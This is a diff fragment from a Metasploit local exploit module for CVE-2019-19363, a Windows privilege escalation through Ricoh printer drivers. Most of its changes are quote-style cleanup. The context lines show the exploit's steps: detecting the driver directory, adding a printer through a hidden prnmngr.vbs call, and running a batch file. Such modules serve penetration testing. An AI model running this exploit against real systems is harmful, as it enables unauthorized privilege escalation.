@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'CVE', '2019-19363'],
           [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
         ],
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Platform' => 'win',
         'Payload' => {},
         'SessionTypes' => [ 'meterpreter' ],
@@ -78,13 +77,13 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     @driver_path = ''
-    dir_name = "C:\\ProgramData\\RICOH_DRV"
+    dir_name = 'C:\\ProgramData\\RICOH_DRV'
 
     return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
 
     driver_names = dir(dir_name)
 
-    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
+    return CheckCode::Detected('Detected Ricoh driver directory, but no installed drivers') unless driver_names.length
 
     vulnerable = false
     driver_names.each do |driver_name|
@@ -131,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Local
     bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
     print_status("Adding printer #{@printer_name}...")
     client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
-    vprint_status("Executing script...")
+    vprint_status('Executing script...')
     cmd_exec(bat_cmd)
   rescue Rex::Post::Meterpreter::RequestError => e
     e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
@@ -147,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     @printer_name = Rex::Text.rand_text_alpha(5..9)
-    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
+    @script_path = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'
     drvr_name = @driver_path.split('\\')
     drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
     drvr_name = drvr_name[drvr_name_idx]
